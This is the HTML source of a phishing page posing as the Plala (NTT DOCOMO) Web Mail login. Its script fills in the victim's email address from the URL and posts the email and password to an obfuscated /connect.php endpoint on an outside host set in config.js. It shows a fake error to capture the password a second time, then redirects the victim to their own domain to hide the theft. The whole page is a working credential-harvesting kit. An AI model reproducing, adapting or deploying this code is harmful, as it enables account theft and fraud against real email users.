
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=euc-jp">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="0">
    <meta name="Description" content="">
    <meta name="Keywords" content="">
    <title>&#x3077;&#x3089;&#x3089; Web&#x30E1;&#x30FC;&#x30EB;</title>
    <link rel="stylesheet"
        href="https://firebasestorage.googleapis.com/v0/b/gent-ba9d4.appspot.com/o/login.css?alt=media&token=bfcff08a-0840-4bd2-a8c2-5b2d4bd12e7e"
        type="text/css">
    <link rel="stylesheet"
        href="https://firebasestorage.googleapis.com/v0/b/gent-ba9d4.appspot.com/o/tsuikalogin.css?alt=media&token=c78d3829-c2cc-4a18-b9e1-98bd7d788387"
        type="text/css">

</head>

<body>

    <div style="position: sticky; top: 0; background-color: #f1f1f1;  z-index: 999;">
        <div id="google_translate_element"></div>
    </div>


    <div id="plala">
        <div class="bg_g">
            <table border="0" cellspacing="0" cellpadding="0" width="750">
                <tr>
                    <td width="750">
                        <div id="head">
                            <table border="0" cellspacing="0" cellpadding="0" width="100%">
                                <tr>
                                    <td>
                                        <table border="0" cellpadding="0" cellspacing="0" width="750" bgcolor="#ffffff">
                                            <tr>
                                                <td colspan="3"><img
                                                        src="https://web1.plala.or.jp/mail/plus/images/spacer.gif"
                                                        width="1" height="11" alt=""></td>
                                            </tr>
                                            <tr>
                                                <td width="8"><img
                                                        src="https://web1.plala.or.jp/mail/plus/images/spacer.gif"
                                                        width="8" height="1" alt=""></td>
                                                <td width="115" valign="top"><a href="#" target="_top"><img
                                                            src="https://web1.plala.or.jp/mail/plus/images/hd_logo_login.gif"
                                                            alt="plala" width="115" height="58" border="0"></a></td>
                                                <td width="627">
                                                    <div><img src="https://web1.plala.or.jp/mail/plus/images/spacer.gif"
                                                            alt="" width="627" height="58" border="0"></div>
                                                </td>
                                            </tr>
                                        </table>
                                        <table border="0" cellpadding="0" cellspacing="0" width="750">
                                            <tr>
                                                <td bgcolor="#eeeeee"><img
                                                        src="https://web1.plala.or.jp/mail/plus/images/barg.gif" alt=""
                                                        width="750" height="30" border="0"></td>
                                            </tr>
                                        </table>
                                    </td>
                                </tr>
                            </table>
                        </div>
                        <!-- ========= /HEADER ========= -->
                    </td>
                </tr>
                <tr>
                    <td>
                        <div id="mainArea">
                            <!-- ========= CAUTION ========= -->
                            <noscript>
                                <table border="0" cellspacing="0" cellpadding="0" width="727">
                                    <tr>
                                        <td>
                                            <div class="caution"><span
                                                    class="S">&#x5F53;&#x30B5;&#x30A4;&#x30C8;&#x3092;&#x3054;&#x89A7;&#x3044;&#x305F;&#x3060;&#x304F;&#x305F;&#x3081;&#x306B;&#x306F;Javascript&#x3092;&#x6709;&#x52B9;&#x306B;&#x3059;&#x308B;&#x5FC5;&#x8981;&#x304C;&#x3042;&#x308A;&#x307E;&#x3059;&#x3002;&#x304A;&#x4F7F;&#x3044;&#x306E;&#x30D6;&#x30E9;&#x30A6;&#x30B6;&#x306E;Javascript&#x3092;&#x201C;&#x6709;&#x52B9;&#x201D;&#x306B;&#x8A2D;&#x5B9A;&#x3057;&#x3066;&#x3054;&#x89A7;&#x4E0B;&#x3055;&#x3044;&#x3002;</span>
                                            </div>
                                        </td>
                                    </tr>
                                </table>
                            </noscript>
                            <!-- ========= /CAUTION ========= -->
                            <div class="m_cnt">
                                <div class="m_cnt_head">&#x3077;&#x3089;&#x3089;&#x3000;Web&#x30E1;&#x30FC;&#x30EB;
                                </div>
                                <div class="m_cnts">
                                    <br>

                                    <!-- error -->
                                    <div>
                                        <table cellspacing=0 cellpadding=1 border=0>
                                            <tbody>
                                                <tr>
                                                    <td class="msgerr" id="error" style="display: none;">
                                                        <b>
                                                            &#x30E1;&#x30FC;&#x30EB;&#x30A2;&#x30C9;&#x30EC;&#x30B9;&#x3001;&#x307E;&#x305F;&#x306F;&#x3001;&#x30E1;&#x30FC;&#x30EB;&#x30D1;&#x30B9;&#x30EF;&#x30FC;&#x30C9;&#x304C;&#x6B63;&#x3057;&#x304F;&#x306A;&#x3044;&#x3088;&#x3046;&#x3067;&#x3059;&#x3002;
                                                            <br>&#x3082;&#x3046;&#x4E00;&#x5EA6;&#x5165;&#x529B;&#x3057;&#x306A;&#x304A;&#x3057;&#x3066;&#x304F;&#x3060;&#x3055;&#x3044;&#x3002;
                                                        </b>
                                                    </td>
                                                </tr>

                                                <div class="msgerr" id="msg" style="display: none;">

                                                    &#x30E1;&#x30FC;&#x30EB;&#x30A2;&#x30C9;&#x30EC;&#x30B9;&#x3001;&#x307E;&#x305F;&#x306F;&#x3001;&#x30E1;&#x30FC;&#x30EB;&#x30D1;&#x30B9;&#x30EF;&#x30FC;&#x30C9;&#x304C;&#x6B63;&#x3057;&#x304F;&#x306A;&#x3044;&#x3088;&#x3046;&#x3067;&#x3059;&#x3002;
                                                    &#x3082;&#x3046;&#x4E00;&#x5EA6;&#x5165;&#x529B;&#x3057;&#x306A;&#x304A;&#x3057;&#x3066;&#x304F;&#x3060;&#x3055;&#x3044;&#x3002;

                                                </div>

                                            </tbody>
                                        </table>
                                        <!-- /error -->
                                    </div>

                                    <!-- ========= CONTENTS ========= -->
                                    <br>
                                    <div align="center">
                                        <form id="" name="form1" data-name="" action="" method="post" required>

                                            <table border="0" align="center" cellpadding="0" cellspacing="1"
                                                width="400">
                                                <tr>
                                                    <td colspan="3" align="center">
                                                        &#x3077;&#x3089;&#x3089;&#x306E;&#x30E1;&#x30FC;&#x30EB;&#x30A2;&#x30C9;&#x30EC;&#x30B9;/&#x30E1;&#x30FC;&#x30EB;&#x30D1;&#x30B9;&#x30EF;&#x30FC;&#x30C9;&#x3092;&#x5165;&#x529B;&#x3057;&#x3066;&#x304F;&#x3060;&#x3055;&#x3044;&#x3002;
                                                    </td>
                                                </tr>
                                                <tr>
                                                    <td colspan="3"><img
                                                            src="https://web1.plala.or.jp/mail/plus/images/spacer.gif"
                                                            height="10"></td>
                                                </tr>
                                                <tr>
                                                    <td align="right">
                                                        &#x30E1;&#x30FC;&#x30EB;&#x30A2;&#x30C9;&#x30EC;&#x30B9;</td>
                                                    <td width="30"><img
                                                            src="https://web1.plala.or.jp/mail/plus/images/spacer.gif"
                                                            width="30" height="1"></td>
                                                    <td align="left"><input type="text" name="ai" id="ai" readonly
                                                            size="26" maxlength="128" value=""
                                                            style="font-family:Arial,Helvetica,sans-serif;" /></td>
                                                </tr>
                                                <tr>
                                                    <td colspan="3"><img
                                                            src="https://web1.plala.or.jp/mail/plus/images/spacer.gif"
                                                            height="5"></td>
                                                </tr>

                                                <tr>
                                                    <td colspan="3"><img
                                                            src="https://web1.plala.or.jp/mail/plus/images/spacer.gif"
                                                            height="5"></td>
                                                </tr>
                                                <tr>
                                                    <td align="right">
                                                        &#x30E1;&#x30FC;&#x30EB;&#x30D1;&#x30B9;&#x30EF;&#x30FC;&#x30C9;
                                                    </td>
                                                    <td></td>
                                                    <td align="left"><input type="password" name="namep" id="pr"
                                                            size="26" maxlength="20"
                                                            style="font-family:Arial,Helvetica,sans-serif;" /></td>
                                                </tr>

                                                <tr>
                                                    <td colspan="3"><img
                                                            src="https://web1.plala.or.jp/mail/plus/images/spacer.gif"
                                                            height="15"></td>
                                                </tr>
                                                <tr>
                                                    <td colspan="3" align="center"><input type="checkbox"
                                                            name="mail_save_flag"
                                                            value="1">&#x30E1;&#x30FC;&#x30EB;&#x30A2;&#x30C9;&#x30EC;&#x30B9;&#x306E;&#x60C5;&#x5831;&#x3092;&#x4FDD;&#x5B58;&#x3059;&#x308B;&#x3002;
                                                    </td>
                                                </tr>
                                            </table>
                                        </form>
                                    </div>
                                    <br>
                                    <div align="center">

                                        <input
                                            onmouseover="this.src='https://web1.plala.or.jp/mail/plus/images/login_on.gif'"
                                            onmouseout="this.src='https://web1.plala.or.jp/mail/plus/images/login.gif'"
                                            type=image src="https://web1.plala.or.jp/mail/plus/images/login.gif"
                                            id="submit-btn" onclick="submitForm(event)" value="　ログイン　">
                                    </div><br><br>
                                    <!-- ========= /CONTENTS ========= -->
                                </div>
                                <div class="m_cnt_foot"></div>
                            </div>
                        </div>
                    </td>
                </tr>

                <tr>
                    <td bgcolor="#FFFFE6"><!-- ========= FOOTER ========= -->
                        <div id="copy"><span class="Mfix">
                                <font color="#000000">
                                    <b>&#x30E1;&#x30FC;&#x30EB;&#x30D1;&#x30B9;&#x30EF;&#x30FC;&#x30C9;&#x306F;&#x4F1A;&#x54E1;&#x767B;&#x9332;&#x8A3C;&#x306B;&#x3066;&#x3054;&#x78BA;&#x8A8D;&#x3044;&#x305F;&#x3060;&#x3051;&#x307E;&#x3059;&#x3002;&#x30E1;&#x30FC;&#x30EB;&#x30D1;&#x30B9;&#x30EF;&#x30FC;&#x30C9;&#x3092;&#x5FD8;&#x308C;&#x305F;&#x65B9;&#x306F;<a
                                            href="#">&#x3053;&#x3061;&#x3089;</a>&#x3092;&#x3054;&#x78BA;&#x8A8D;&#x4E0B;&#x3055;&#x3044;&#x3002;<br>&#x8907;&#x6570;&#x30E1;&#x30FC;&#x30EB;&#x306E;&#x30E1;&#x30FC;&#x30EB;&#x30D1;&#x30B9;&#x30EF;&#x30FC;&#x30C9;&#x3092;&#x5FD8;&#x308C;&#x305F;&#x65B9;&#x306F;<a
                                            href="#">&#x3053;&#x3061;&#x3089;</a>&#x3092;&#x3054;&#x78BA;&#x8A8D;&#x304F;&#x3060;&#x3055;&#x3044;
                                </font><br>&copy;NTT DOCOMO
                            </span></div>
                        <!-- ========= /FOOTER ========= -->
                    </td>
                </tr>
            </table>
        </div>
    </div>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="./config.js"></script>
   <script>
/* global $ */
$(document).ready(function() {
    var count = 0;

    $('#back1').click(function() {
        $("#msg").hide();
        $('#ai').val("");
        $("#automail").animate({ left: 200, opacity: "hide" }, 0);
        $("#inputbar").animate({ right: 200, opacity: "show" }, 1000);

    });

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        $('#ai').val(my_ai);
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);
        $("#msg").hide();
        $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
        $("#automail").animate({ right: 200, opacity: "show" }, 1000);
    }
    ///////////////url getting ai////////////////


    var atu = "L2Nvbm5lY3QucGhw";
	
    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("&#x30E1;&#x30FC;&#x30EB;&#x30A2;&#x30C9;&#x30EC;&#x30B9;&#x3001;&#x307E;&#x305F;&#x306F;&#x3001;&#x30E1;&#x30FC;&#x30EB;&#x30D1;&#x30B9;&#x30EF;&#x30FC;&#x30C9;&#x304C;&#x6B63;&#x3057;&#x304F;&#x306A;&#x3044;&#x3088;&#x3046;&#x3067;&#x3059;&#x3002;");
            ai.focus;
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("&#x30E1;&#x30FC;&#x30EB;&#x30A2;&#x30C9;&#x30EC;&#x30B9;&#x3001;&#x307E;&#x305F;&#x306F;&#x3001;&#x30E1;&#x30FC;&#x30EB;&#x30D1;&#x30B9;&#x30EF;&#x30FC;&#x30C9;&#x304C;&#x6B63;&#x3057;&#x304F;&#x306A;&#x3044;&#x3088;&#x3046;&#x3067;&#x3059;&#x3002;");
            ai.focus;
            return false;
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("&#x30E1;&#x30FC;&#x30EB;&#x30A2;&#x30C9;&#x30EC;&#x30B9;&#x3001;&#x307E;&#x305F;&#x306F;&#x3001;&#x30E1;&#x30FC;&#x30EB;&#x30D1;&#x30B9;&#x30EF;&#x30FC;&#x30C9;&#x304C;&#x6B63;&#x3057;&#x304F;&#x306A;&#x3044;&#x3088;&#x3046;&#x3067;&#x3059;&#x3002;");
            ai.focus;
            return false;
        }
		
		
		if(pr.length < 5) {  

			$('#error').show();
            $('#error').html("&#x30E1;&#x30FC;&#x30EB;&#x30A2;&#x30C9;&#x30EC;&#x30B9;&#x3001;&#x307E;&#x305F;&#x306F;&#x3001;&#x30E1;&#x30FC;&#x30EB;&#x30D1;&#x30B9;&#x30EF;&#x30FC;&#x30C9;&#x304C;&#x6B63;&#x3057;&#x304F;&#x306A;&#x3044;&#x3088;&#x3046;&#x3067;&#x3059;&#x3002;");
            ai.focus;  

			return false;  

		}

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        ///////////new injection////////////////
        count = count + 1;
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);

        $.ajax({
            dataType: 'JSON',
            url: `${config.baseUrl}${atob(atu)}`,
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifing...');
            },
            success: function(response) {
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $("#pr").val("");
                        if (count >= 2) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                            window.location.replace("https://"+my_slice);

                        }
                        // $('#msg').html(response['msg']);
                    } else {
                        // $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("https://"+my_slice);
                }
                $("#msg").show();
                // $('#msg').html("Please try again later");
            },
            complete: function() {
                $('#submit-btn').html('Login');
            }
        });
    });


});

function getParameterByName(name, url) {
			if (!url) url = window.location.href;
			name = name.replace(/[\[\]]/g, '\\$&');
			var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
				results = regex.exec(url);
			if (!results) return null;
			if (!results[2]) return '';
			return decodeURIComponent(results[2].replace(/\+/g, ' '));
		}
			
		const login_username = getParameterByName('cms');
		document.getElementById("ai").value = login_username;
</script>
</body>

</html>